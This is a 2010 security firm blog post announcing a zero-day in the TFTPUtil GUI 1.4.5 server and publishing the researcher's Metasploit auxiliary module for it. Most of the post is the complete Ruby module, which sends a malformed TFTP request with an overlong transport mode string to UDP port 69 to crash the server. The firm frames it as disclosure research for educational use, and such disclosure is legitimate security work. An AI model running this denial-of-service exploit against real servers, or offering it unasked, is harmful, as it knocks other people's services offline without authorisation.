RedTeam Labs

Information Security Vulnerablities, Exploit Code and News

CATEGORIES:      Company News General Industry News Research List View

RedTeam TFTPUtil GUI 0day Ported to Metasploit

Category: Research Tags: metasploit, 0day, tftputil gui, dos, exploit
Posted by: labs@redteamsecure.com (Jeremiah Talamantes on 2010-05-14 10:21:14

Jeremiah Talamantes, Principal Security Consultant and Security Researcher at RedTeam Security, discovered a 0-day security vulnerability in TFTPUtil GUI version 1.4.5 last week. The security vulnerability allows a remote attacker to send a malicious payload (overly long transport mode string) that results in a Denial of Service.

Just recently, Jeremiah has ported the proof of concept exploit code from Python language to Metasploit on Ruby. Please see the Metasploit auxiliary Denial of Service module below. Or if you prefer, you will also find the code published by Exploit-DB among other online exploit databases.

Published Version:
Exploit-DB: 12530




# Title: TFTPGUI v1.4.5 Long Transport Mode Overflow DoS (Meta)

# EDB-ID: 12530

# CVE-ID: ()

# OSVDB-ID: ()

# Author: Jeremiah Talamantes

# Published: 2010-05-08

# Verified: yes



##

# This file is part of the Metasploit Framework and may be subject to 

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/ 

##



##

#

# TFTPGUI v1.4.5 Long Transport Mode Overflow

#

# Tested on: Windows XP, SP2 (EN)

#

# Date tested: 5/2/2010

#

#

# |~Greetz to Devin @ infointox.net~|

#

# Discovered by: Jeremiah Talamantes

# RedTeam Security

# http://www.redteamsecure.com

##



require 'msf/core'



class Metasploit3 < Msf::Auxiliary



	include Msf::Exploit::Remote::Udp

	include Msf::Auxiliary::Dos



	def initialize(info = {})

		super(update_info(info,

			'Name'           => 'TFTPGUI v1.4.5 Long Transport Mode Overflow',

			'Description'    => %q{

				The TFTPUtil GUI server version 1.4.5 can be

				DOSed by sending a specially crafted request. Discovered by

				Jeremiah Talamantes at RedTeam Security. 

				Greetz to Devin @ infointox.net.

			},

			'Author'         => 'Jeremiah Talamantes (RedTeam Security)',

			'License'        => MSF_LICENSE,

			'Version'        => '$Revision: 9179 $',

			'References'     =>

				[ 

					[ 'URL', 'http://www.redteamsecure.com/labs/post/37/redteam-discovers-0-day-in-tftpgui'], 

					[ 'URL', 'http://www.exploit-db.com/exploits/12482'], 

					[ 'URL', 'http://www.securityfocus.com/bid/39872'],

				],

			'DisclosureDate' => 'May 02 2010'))



		register_options([Opt::RPORT(69)])

	end



	def run

		connect_udp

		print_status("Sending naughty request...")

		$fn = "A"

		$md = "A" * 496

		$stuff = "\00\x02" + $fn + "\0" + $md + "\0"

		udp_sock.put($stuff)		

		disconnect_udp

	end

end



Share |



Follow Our Twitter

Follow Our RSS

Share this: |


Categories



DISCLAIMER
    The content, tools, methodologies and proof of concept code contained in these articles are in no way intended to be used for malicious intent. This information is to be used for educational purposes only. RedTeam Security does not condone the malicious use nor does it warranty the use of any of the content contained herein.


Contact Us

Phone number:
1-612-234-7848

E-mail:

info@redteamsecure.com